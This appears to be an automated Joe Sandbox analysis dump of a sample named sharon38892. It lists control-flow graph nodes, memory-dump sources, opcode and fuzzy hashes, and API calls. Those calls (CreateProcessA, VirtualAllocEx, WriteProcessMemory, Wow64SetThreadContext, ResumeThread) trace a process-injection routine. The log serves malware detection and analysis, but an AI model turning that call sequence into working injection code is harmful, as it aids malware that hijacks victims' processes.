582->581 583 25e9d5 582->583 583->581 587 25e9f7-25ea20 584->587 588 25ea2b-25ea36 584->588 585->584 586 25e9e9 585->586 586->584 587->588 592 25ea37 588->592 592->592
                        APIs
                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025E8AF
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 560bd340387d11936c7267222ffe3087390103e8da84cac733c7458bf6502e60
                        • Instruction ID: 7482b224c5504a89d5ecfe59f206edf21ab323a0d1c97043dfc00b96dca4be84
                        • Opcode Fuzzy Hash: 560bd340387d11936c7267222ffe3087390103e8da84cac733c7458bf6502e60
                        • Instruction Fuzzy Hash: B1C12970D102298FDF24CFA8C845BEDBBB1BF09300F0095A9D819B7294DB749A99CF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 693 25e250-25e2bb 695 25e2d2-25e339 WriteProcessMemory 693->695 696 25e2bd-25e2cf 693->696 698 25e342-25e394 695->698 699 25e33b-25e341 695->699 696->695 699->698
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E323
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: a2d22455d343706a3a20ee87da35f62e03357569d5aea518f5ebd26034cb275e
                        • Instruction ID: a999af5b756cff206ca569fa94bc1b35a51903432ad15d5e7f00ea7937923ca5
                        • Opcode Fuzzy Hash: a2d22455d343706a3a20ee87da35f62e03357569d5aea518f5ebd26034cb275e
                        • Instruction Fuzzy Hash: B841B9B4D012489FCF00CFA9D984AEEFBF1BB49314F20942AE814B7210C774AA55CF64

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 704 25e3b0-25e478 ReadProcessMemory 707 25e481-25e4d3 704->707 708 25e47a-25e480 704->708 708->707
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025E462
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 0b07acfb0b7090d9d75755a8abf3ca0affb1888fabae187e74afc8e55e3cd805
                        • Instruction ID: bdd1cba4ec3a8c1bafa6e496833448307f4fa3193b5873841bba05d72bcc72ed
                        • Opcode Fuzzy Hash: 0b07acfb0b7090d9d75755a8abf3ca0affb1888fabae187e74afc8e55e3cd805
                        • Instruction Fuzzy Hash: 7B41BAB4D002589FCF10CFA9D884AEEFBB1BF49310F10942AE814B7200C774AA55CF68

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 713 25e128-25e1e8 VirtualAllocEx 716 25e1f1-25e23b 713->716 717 25e1ea-25e1f0 713->717 717->716
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0025E1D2
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 5c0213882e6ebda522590b74f8fcc349f2c9d2ba5b7ef1a6f0213bad401f24ae
                        • Instruction ID: c275c03d2fa5b048a7b558d60e9cd03f3756d91e2a9d0bd4907b7655d7d399ca
                        • Opcode Fuzzy Hash: 5c0213882e6ebda522590b74f8fcc349f2c9d2ba5b7ef1a6f0213bad401f24ae
                        • Instruction Fuzzy Hash: CB41A9B4D002589BCF14CFA9D980AAEFBB1AB49310F10942AE814B7214D775A915CF65
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 0025DC6F
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 3b04da862470a8d8c06fa43acfe9db149fd6c5cdf5199766b8a674bc93bd42a0
                        • Instruction ID: 768d3c3831846900705e7812f2db60018a766cad13eddcd4a8666199be81e741
                        • Opcode Fuzzy Hash: 3b04da862470a8d8c06fa43acfe9db149fd6c5cdf5199766b8a674bc93bd42a0
                        • Instruction Fuzzy Hash: 3841ABB4D102589FCF10CFA9D984AEEFBB1AF49315F24842AE818B7250D778A949CF54
                        APIs
                        • ResumeThread.KERNELBASE(?), ref: 0025DB4E
                        Memory Dump Source
                        • Source File: 00000005.00000002.364626759.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_250000_sharon38892.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: d175761ecd6f4f19efea8805e6088785b4abb851008fdecfa226b8335c611bc4
                        • Instruction ID: 8860a97742b78b1c814baf51e835d724e79cd25f2f029b77ee0eb8bcfb105873
                        • Opcode Fuzzy Hash: d175761ecd6f4f19efea8805e6088785b4abb851008fdecfa226b8335c611bc4
                        • Instruction Fuzzy Hash: 4A31CBB4D102189FCF10CFA9D984AEEFBB5AF49314F24942AE814B7300C775A945CF98
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8}R
                        • API String ID: 0-3402455641
                        • Opcode ID: 873b2e37ae39692fbdcab26da98d682eb76fc364783f0f7542c2881dd49a798c
                        • Instruction ID: eba60e0ee06fd9e4ec2523396d4ba90dcd92144929d1306ba5413292dcf5c2a3
                        • Opcode Fuzzy Hash: 873b2e37ae39692fbdcab26da98d682eb76fc364783f0f7542c2881dd49a798c
                        • Instruction Fuzzy Hash: 41511778E042089FDB04DFA8D845AEDBBB6FF8A300F209029E919A7355EB301D06DF50
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID: (
                        • API String ID: 0-3887548279
                        • Opcode ID: e93e4e4d4f3c7e38ddfc0135f6429e909b7f9556e5cd5e4fd3717b652259002d
                        • Instruction ID: 19eb78bfccea3aefed5419e0f37f190f330336f04306b289d7fbff0bd53e54b5
                        • Opcode Fuzzy Hash: e93e4e4d4f3c7e38ddfc0135f6429e909b7f9556e5cd5e4fd3717b652259002d
                        • Instruction Fuzzy Hash: EE014634909268CFDB24CF64CD44BECBBB5BB4A305F0042D9D409A7291D331AE86DF10
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79e0f978c4f7b0113aa331b9cf6f83d99e08d66adf3c5466cc23f582fbf2a2e8
                        • Instruction ID: d7c846f000735e5e9e3947c2bd693d1564bb3db348c3a5819c02b7a0695ed64a
                        • Opcode Fuzzy Hash: 79e0f978c4f7b0113aa331b9cf6f83d99e08d66adf3c5466cc23f582fbf2a2e8
                        • Instruction Fuzzy Hash: 2A610578905229CFDB64CF54DC54BE8BBB5BB0A300F1081EAD549A6291EB31AEC6DF50
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25e18e1355bffa367eaa95aaad77e8385311300b21bf012cfb5898fbb8ad2cd7
                        • Instruction ID: 102523fdad3ce1e9623bdaf053929b7ec93653862eb9f7fa484b66ed07a8bc1a
                        • Opcode Fuzzy Hash: 25e18e1355bffa367eaa95aaad77e8385311300b21bf012cfb5898fbb8ad2cd7
                        • Instruction Fuzzy Hash: E7412875E45229DFDB64CF54CC40BE8B7B5BF9A300F1092EAD549A2240EB716AC6DF40
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c1465f7a2e271ffcca311b31ab9d964d3b2a10e6f0c42e883232f3f284e43946
                        • Instruction ID: fc9540a36218dd78ba1dac475e5055c454fca15810076aa4d115c30dceb5eebe
                        • Opcode Fuzzy Hash: c1465f7a2e271ffcca311b31ab9d964d3b2a10e6f0c42e883232f3f284e43946
                        • Instruction Fuzzy Hash: 7341D478E05308EFEB14CFE4E884BADBBB5BF4A301F205025E945AB395E7706946DB00
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 17b095a8178afe0ea353389f33d78f3a0424cf4f78ff6b61357aa89a865f08c1
                        • Instruction ID: 31fdea42a34f8c5476b1f97ff0eed7dd3844e0b413dac2a48881967360199e5c
                        • Opcode Fuzzy Hash: 17b095a8178afe0ea353389f33d78f3a0424cf4f78ff6b61357aa89a865f08c1
                        • Instruction Fuzzy Hash: 27412775E0521ADFDB64CF64CC40BE8B7B5BF5A300F1082EAD549A6240EB706AC6DF40
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f36e7d47459b2afdd8da0d07e695880142ac968430979e970bb5a1fa1160823
                        • Instruction ID: 8631fbc666d539ce973c4472250ed89caf79428a7e4dc09cd1594762ded73cd4
                        • Opcode Fuzzy Hash: 2f36e7d47459b2afdd8da0d07e695880142ac968430979e970bb5a1fa1160823
                        • Instruction Fuzzy Hash: 22410774D4521ADFDB64CF54CC40BE8B7B5BF5A300F1082EAD549A6250EB706AC5DF40
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 169c57f9fe7c108a93dc4195fdbf5b495857ab16136197831007f5de1f940e2b
                        • Instruction ID: c3a045bdc66deebe53606b95d36c811d398d3ac831c5f20ed9cb02c682c1a2d4
                        • Opcode Fuzzy Hash: 169c57f9fe7c108a93dc4195fdbf5b495857ab16136197831007f5de1f940e2b
                        • Instruction Fuzzy Hash: C931C838A45218EBEB20CFA0ED95FADB775FB4A301F204155EA49A7391DB706E46DF00
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 52ebdb87552adceb439a20d441472a7eb5d5aef06ebbf6166071f2ca4fd36641
                        • Instruction ID: eafd492cb29f8822b766a9a1d60e1a71618af38fd291b2e8857559b5c747a159
                        • Opcode Fuzzy Hash: 52ebdb87552adceb439a20d441472a7eb5d5aef06ebbf6166071f2ca4fd36641
                        • Instruction Fuzzy Hash: 7031D838A41218EBEB20CB60DD95FADB775FB4A301F108055EA49A7391DB706E86DF40
                        Memory Dump Source
                        • Source File: 00000005.00000002.363615404.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_cd000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 015e569f3a384883c7fb76126a6e151b9a263a08964763cda96ede1ceaf42569
                        • Instruction ID: 041c0128832446db70e1f4170462a0def3906079d10e29e3c6ebd9682cdbdff2
                        • Opcode Fuzzy Hash: 015e569f3a384883c7fb76126a6e151b9a263a08964763cda96ede1ceaf42569
                        • Instruction Fuzzy Hash: A821AF75604240AFDB25CF18D884F2ABBA5EB84314F34C5BEE84A4B256C336D847CBA1
                        Memory Dump Source
                        • Source File: 00000005.00000002.363615404.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_cd000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e20a0300da9148944f2d64fe9c7e0b479bf44945b8b6d0c70e09af0bd1cc01e2
                        • Instruction ID: 54b16f061ac72567c20b382fadaedde181f52c1c04bb47ea66623a84ac7b47ea
                        • Opcode Fuzzy Hash: e20a0300da9148944f2d64fe9c7e0b479bf44945b8b6d0c70e09af0bd1cc01e2
                        • Instruction Fuzzy Hash: 9021F2B1604240EFDB11CF14D9C0F2ABBA1FB94314F24C5BEE8494B286C336D846CB61
                        Memory Dump Source
                        • Source File: 00000005.00000002.363615404.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_cd000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64006da6675ded6e2369e997191632a39f6ac3f2cf3087ae85bd410ca571b034
                        • Instruction ID: d56428a14c0c1d39917f081c30c8200f7a934c9829ca166f4aa8e46accf59457
                        • Opcode Fuzzy Hash: 64006da6675ded6e2369e997191632a39f6ac3f2cf3087ae85bd410ca571b034
                        • Instruction Fuzzy Hash: 742150755083809FDB12CF14D994B15BFB1EB46314F28C5EBD8498F267C33A985ACB62
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 52496a58a3a1e80fafa86031350c08481101c094b4319bb7ebd9b9a0569a4786
                        • Instruction ID: 2339cde873efad00662e2eee714de124e280b14bbf451086fcf25b1bbde215b0
                        • Opcode Fuzzy Hash: 52496a58a3a1e80fafa86031350c08481101c094b4319bb7ebd9b9a0569a4786
                        • Instruction Fuzzy Hash: B221F738A41218EBEB20CB60ED55FACB775FB4A301F108095EA49A7391DA706E86DF00
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec27cf48c085525b719373ed3dac81fecb682dad8a8f9c7f71a60cd5dc9fd5e7
                        • Instruction ID: 177888aaee74aace9b285b8109e303eb6774c1dab66fdcfea90c1ed295a9fe42
                        • Opcode Fuzzy Hash: ec27cf48c085525b719373ed3dac81fecb682dad8a8f9c7f71a60cd5dc9fd5e7
                        • Instruction Fuzzy Hash: 7B21F738908228DFCB60CF64DC847EDBBB5AF5A301F144099D149A6251EB356E86DF41
                        Memory Dump Source
                        • Source File: 00000005.00000002.363615404.00000000000CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000CD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_cd000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                        • Instruction ID: 37b1aca266e81225712db09446aa3a2dc6665751eefd52451e9758758b0808ee
                        • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                        • Instruction Fuzzy Hash: E8119D75904280DFDB52CF14D9C4B19FFA1FB94314F28C6AED8494B696C33AD84ACBA1
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 396de4f5ddabcb03a7e9c6d9c57fb548a5c7414c10be2f1d24de0d01439e8dca
                        • Instruction ID: 9837723faa8df890765f7b949e3a2218a0cd036fc793053b0c8f5e644967dd20
                        • Opcode Fuzzy Hash: 396de4f5ddabcb03a7e9c6d9c57fb548a5c7414c10be2f1d24de0d01439e8dca
                        • Instruction Fuzzy Hash: 0C113A74E09209CFCB44DFA8C8451AEBFF5AF5A300F1481AAC848E3351E7345A42CF90
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f72e9140e8d5d3eed52dd96eca7207b63b0fe5174fd86480faf1f223ad9ce9a3
                        • Instruction ID: 052ea4bcf9540bea6c5866fcd22204cc6baa84072f43c16f4a7191b2311e680c
                        • Opcode Fuzzy Hash: f72e9140e8d5d3eed52dd96eca7207b63b0fe5174fd86480faf1f223ad9ce9a3
                        • Instruction Fuzzy Hash: F8111B74E19209DFCB40CFA9C9951ADBFF5AF5A300F1090AAC948E3312E7341A06DB51
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eaf09b195a636b94110ff56a5a8937e2c3dc25ba7563dc314169da7ccda0ec62
                        • Instruction ID: 846f9c5092a96894bab58878bbad3c025ed2202dc5d806db7e343b975a6aa19f
                        • Opcode Fuzzy Hash: eaf09b195a636b94110ff56a5a8937e2c3dc25ba7563dc314169da7ccda0ec62
                        • Instruction Fuzzy Hash: 1311E2B4E05209DFCB44DFA9C8456AEBBF5BF89301F1091AAC859A3314E7346A42DF90
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b485dfe060f35765b9d1cbadd65b304dfd301b2eabbe1775c72502cd31670adf
                        • Instruction ID: ef3115aa9a1e3b1dd317f103452a382ece5bec8d214a7877285576e37ea50cda
                        • Opcode Fuzzy Hash: b485dfe060f35765b9d1cbadd65b304dfd301b2eabbe1775c72502cd31670adf
                        • Instruction Fuzzy Hash: 0B01D2B1900228DFDB50DF64C840BE9B7F4EB1A351F1085D9D559A2280DB75AF89CF90
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 22174cc1442ae9772ce439a154aa40a5fc2cab3391cbaa4f71a292729bfd586a
                        • Instruction ID: 1d5fc5480c03832cb6cec527d41418cc53340556d4ba296321d4e3a074e46e7a
                        • Opcode Fuzzy Hash: 22174cc1442ae9772ce439a154aa40a5fc2cab3391cbaa4f71a292729bfd586a
                        • Instruction Fuzzy Hash: 1B011279914224CFCB24DF64DC647E877B1BB4A311F0442DA854DA6391E7356EC6DF10
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b97cc735c753b35881a6f363674ae4b7d28dd00af5662ff3d427539db9339bbc
                        • Instruction ID: 2ff56bcd50d7f0936a1a645d771f0832b6bb18ab9b244504f9c9d75935eba2bd
                        • Opcode Fuzzy Hash: b97cc735c753b35881a6f363674ae4b7d28dd00af5662ff3d427539db9339bbc
                        • Instruction Fuzzy Hash: 82F03034D45208DFC714DFA8DC486ADBBB8BB8A341F1095AAC849A3354EB301E16DF44
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea0ab635b84ff7d4f9b789ec77b8ebf91f99aceb5cba15083a43f904e0de76b0
                        • Instruction ID: 5f568fae6a11040a1556e6f77d3292754ce4482e83dca26a5d81de2cda13fbaa
                        • Opcode Fuzzy Hash: ea0ab635b84ff7d4f9b789ec77b8ebf91f99aceb5cba15083a43f904e0de76b0
                        • Instruction Fuzzy Hash: D6E01A30A5E2489FC7059BA8DD652ACFF78AB47200F2492EBC98853292D6302906DB02
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b58a222a02c6320ef6dc9410765581ae2db99244db73d6b6e36534626b4d698
                        • Instruction ID: b3e420d970a686875c104b79244d4baab9cfa419f2090f05beda525dbb0ae757
                        • Opcode Fuzzy Hash: 4b58a222a02c6320ef6dc9410765581ae2db99244db73d6b6e36534626b4d698
                        • Instruction Fuzzy Hash: 18F06D3499A2489FC741DFB8D95569C7FF0EF0A200F1041EAC985D7372E2305D45CB41
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f6d1351581859f72d4376946619c73c1544a6690ea6b2386b725fe9fdf5b9ae7
                        • Instruction ID: 762e461372779501131f5a172ace9d835e8625d512bf3275aaa92fc2f603857c
                        • Opcode Fuzzy Hash: f6d1351581859f72d4376946619c73c1544a6690ea6b2386b725fe9fdf5b9ae7
                        • Instruction Fuzzy Hash: 7EE0E574E05118DBEF00DFA9DC442EDBBB5BF8A205F006025D255A3652FB34A546DB50
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f0b7042b38ed654386508619c8394d2f1e753ca9576cede29f51db4da0abb5c6
                        • Instruction ID: 6eedb257975cd24b95ac852115e0ed8a8fedc06a09886c02620e5d7daba2ee81
                        • Opcode Fuzzy Hash: f0b7042b38ed654386508619c8394d2f1e753ca9576cede29f51db4da0abb5c6
                        • Instruction Fuzzy Hash: 70E06D7090A3889FCB01DFB8D89125CBFB0AF41200F1482EAC88486252E6305E45CB81
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0ac24fc83326b839871bbaaa0dd25c1944ca66e64026d6aaed9b1aac4d8aa05a
                        • Instruction ID: 50c6cbaab6fbca8bd95f4f408634c2561b33053314ce691366d50af62c163c14
                        • Opcode Fuzzy Hash: 0ac24fc83326b839871bbaaa0dd25c1944ca66e64026d6aaed9b1aac4d8aa05a
                        • Instruction Fuzzy Hash: 20F06D34A09119CFDB24CF50C954AF8BBB5FB0A304F0441EAC94D97352E731AA46DF10
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b8218edbcb2340a5a46d8396a71c4872f1297596d2c94cf443c21a8bd1774721
                        • Instruction ID: d5672b8a41956217e9bc3230d1a361dcbe063bcee559359532c2eab779fa1190
                        • Opcode Fuzzy Hash: b8218edbcb2340a5a46d8396a71c4872f1297596d2c94cf443c21a8bd1774721
                        • Instruction Fuzzy Hash: 3FE0C22045B2885FD3028BB88C62B68BF78DB03100F0946DAC4C44B6A3D9211D05D352
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bb3cb74a5a71dd5adc071558cbb2e329cc7c5ffa7fb8309e6a18d1c3f3b9f5b0
                        • Instruction ID: 50d73c005f1688ece3294cd6ecf0fd486760352e01349d4da3d4364e2ae24eeb
                        • Opcode Fuzzy Hash: bb3cb74a5a71dd5adc071558cbb2e329cc7c5ffa7fb8309e6a18d1c3f3b9f5b0
                        • Instruction Fuzzy Hash: D4E0EE75A00258DFDB54CF94CC80BE8B7B9AB88301F248099A509AB281D632AE86CF10
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0611361100c03fa80092cd16b0f407fcb352079c25ee9b18cdb8c5d16be0e5c2
                        • Instruction ID: 0f580100f812daa201dfdbe9030ff4a922a16559493ca29cf365b78768048d49
                        • Opcode Fuzzy Hash: 0611361100c03fa80092cd16b0f407fcb352079c25ee9b18cdb8c5d16be0e5c2
                        • Instruction Fuzzy Hash: D9D05E30907208EBDB14EFB8ED516ADBB7AEB85305F6051EDC98423351E7316A41DF85
                        Memory Dump Source
                        • Source File: 00000005.00000002.367348911.00000000046F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_46f0000_sharon38892.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cafc54460c19fa9cfd659b85724af1b06a443c182a651be3692ddb5c2756cf3f
                        • Instruction ID: 61c801f884f3e2dcc32d31975a4d9505783c4b3bc9934ffa8d01b361b575e62b
                        • Opcode Fuzzy Hash: cafc54460c19fa9cfd659b85724af1b06a443c182a651be3692ddb5c2756cf3f
